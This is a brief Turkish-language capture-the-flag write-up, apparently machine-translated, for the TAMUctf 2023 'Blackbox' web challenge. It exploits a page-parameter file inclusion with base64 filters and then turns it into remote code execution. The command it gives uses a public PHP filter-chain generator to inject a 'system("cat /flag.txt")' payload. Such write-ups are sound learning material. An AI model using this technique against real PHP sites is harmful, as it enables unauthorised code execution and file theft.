TAMUctf 2023- Blackbox Yazma

May 01 2023
Bu meydan okuma Bay Blade tarafından oluşturulmuştur. Giriş sayfasını sayfa parametresiyle yüklediğini görebiliriz.

Bu meydan okuma, Bay Blade tarafından oluşturulmuştur.

Giriş sayfasını sayfa parametresiyle yüklediğini görebiliriz .

Dosyaları sıralayalım. Önce yöneticiyi denedim ve base64 kodlayıcıları kullandım.

Bunu çözdüğümüzde flag.txt dosyasının yolunu bulabiliriz.

<merkez>
<h1><?php include('/flag.txt'); ?></h1>
</center>

Ben kullanıyorumhttps://github.com/synacktiv/php_filter_chain_generator/blob/main/php_filter_chain_generator.py
RCE'yi almak için.

python3 filter_chain.py — chain ‘<?php system(“cat /flag.txt”);?>’ | grep ‘^php*’ | xclip -selection clipboard

Okuduğunuz için teşekkürler.

Mutlu Hacking!